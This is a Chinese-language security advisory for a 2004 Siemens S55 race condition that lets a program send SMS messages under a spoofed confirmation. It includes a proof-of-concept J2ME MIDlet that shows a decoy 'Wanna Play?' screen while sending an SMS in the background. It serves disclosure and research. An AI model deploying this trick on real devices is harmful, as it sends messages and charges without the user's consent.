发布日期：2004-04-27
更新日期：2004-05-08

受影响系统：

Siemens Mobile Phone S55

描述：

---

BUGTRAQ  ID: 10227

Siemens S55是一款移动电话。

Siemens S55在验证SMS消息时存在竞争条件错误，远程攻击者可以利用这个漏洞伪造可信任手机用户发送SMS消息。

目前没有详细漏洞细节提供。

<*来源：FtR （ftr@phenoelit.de）
        FX （fx@phenoelit.de）
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

FtR （ftr@phenoelit.de）和FX （fx@phenoelit.de）提供了如下测试方法：

package hello;
import javax.microedition.lcdui.*;
import javax.microedition.midlet.*;
import com.siemens.mp.game.Sound;
import com.siemens.mp.gsm.*;
import java.lang.*;
import java.io.*;

public class hello extends MIDlet implements CommandListener
{
   static final String EXIT_COMMAND_LABEL = "Exit FtRs world";
   Display             display;
   static hello        hello;

   public void startApp (){
      HelloCanva kanvas = new HelloCanva();
      Scr2 scr2 = new Scr2();
      display = Display.getDisplay(this);
      // Menu
      Command exitCommand  = new Command(EXIT_COMMAND_LABEL , Command.SCREEN, 0);
      scr2.addCommand(exitCommand);
      scr2.setCommandListener(this);
      //Data

      // screen 1
      display.setCurrent(kanvas);
      mycall();
      // screen 2
      display.setCurrent(scr2);
      //destroyApp(false);
    }

    public void mycall(){

    String SMSstr= "Test";

    try {
        /* Send SMS VALIAD NUMEBER SHALL BE IN SERTED HERE*/
                SMS.send("0170-Numder", SMSstr);
        }
        /* Exception handling */
        catch (com.siemens.mp.NotAllowedException ex) {
        // Some handling code ...
        }
        catch (IOException ex) {
        //Some handling code ...
        }
        catch (IllegalArgumentException ex) {
        // Some handling code ...
        }
  } //public viod call()

   protected void destroyApp (boolean b){
      display.setCurrent(null);
      this.notifyDestroyed();       // notify KVM
   }

   protected void pauseApp ()
   { }

   public void commandAction (Command c, Displayable d){
      destroyApp(false);
   }

}

class HelloCanva extends Canvas
{
    public void paint (Graphics g)
    {
        String str = new String("Wanna Play?");
        g.setColor(0,0,0);
        g.fillRect(0, 0, getWidth(), getHeight());
        g.setColor(255,0,0);
        g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
        g.drawString("yes", (getWidth()/2)-35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
        g.drawString("no", (getWidth()/2)+35,(getHeight()/2)+35, Graphics.HCENTER | Graphics.BASELINE);
    }
}
class Scr2 extends Canvas
{
    public void paint (Graphics g) {
        String str = new String("cool");
        g.setColor(0,0,0);
        g.fillRect(0, 0, getWidth(), getHeight());
        g.setColor(255,0,0);
        g.drawString(str, getWidth()/2,getHeight()/2, Graphics.HCENTER | Graphics.BASELINE);
    }
}

建议：

---

厂商补丁：

Siemens
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.siemens-mobile.com

浏览次数：2876
严重程度：0（网友投票）